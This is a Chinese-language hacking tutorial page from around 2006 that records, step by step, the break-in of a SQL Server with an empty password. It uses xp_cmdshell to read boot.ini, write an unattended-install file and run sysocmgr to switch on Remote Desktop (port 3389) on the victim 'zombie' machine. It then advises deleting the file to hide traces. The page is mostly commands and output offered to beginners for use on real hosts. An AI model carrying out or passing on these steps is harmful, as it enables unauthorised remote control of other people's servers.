SQL开3389入侵实例记录（献给新手） - 晨风资讯网 - asp教程,php教程,jsp教程,asp.net教程,sql教程,FLASH教程

网站首页

教程下载

源码下载

字体下载

新闻资讯┊网络冲浪┊网页设计┊网络编程┊图形图像┊数据库┊网络媒体┊服务器┊网络安全┊网站运营┊软件教程┊黑客┊认证┊Wap技术

教程搜索：

高级搜索网站信息查询工具

首页 > 黑客教程 > 入侵实例 > 正文

SQL开3389入侵实例记录（献给新手）
日期：2006-2-15 10:34:15 来源：网络作者：无名浏览:次

把一次从SQL开3389的记录过程发出来，望对新手有用

注：//为注释
实例过程：
连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:xp_cmdshell "type c:\boot.ini" // 输入命令，看系统，server版的才能开3389
执行成功,结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

命令:xp_cmdshell "echo [Components] > c:\duguxike" //在c盘根目录建写入一个文件，文件名duguxike大家可以自己改为自己的
执行成功,结果:

命令:xp_cmdshell "echo TsEnable = on >> c:\duguxike" //追加写入
执行成功,结果:

命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确
执行成功,结果:
[Components]
TsEnable = on
TsEnable = on

命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389，成功的话过会肉机会重启！！
执行成功,结果:
GetLocalManagedApplications returned (2)

之后就看大家的了，不过要记得册除新建的duguxike文件哦！！！

通过3389端口入侵经典案例

利用冰舞2.5进行一次简单的注入

返回列表打印此页加入收藏资讯论坛关闭窗口点击复制本页地址，发送给QQ/MSN好友

	关于我们 - 联系我们 - 版权声明 - 帮助(？) - 广告服务 - 友情链接 - 服务项目 - 人才招聘
	2003-2008 版权所有 © 晨风资讯网未经授权禁止复制或建立镜像
	CopyRight 2003-2008 www.Net118.com,All Rights Reserved.Design By ChenFeng Network Studio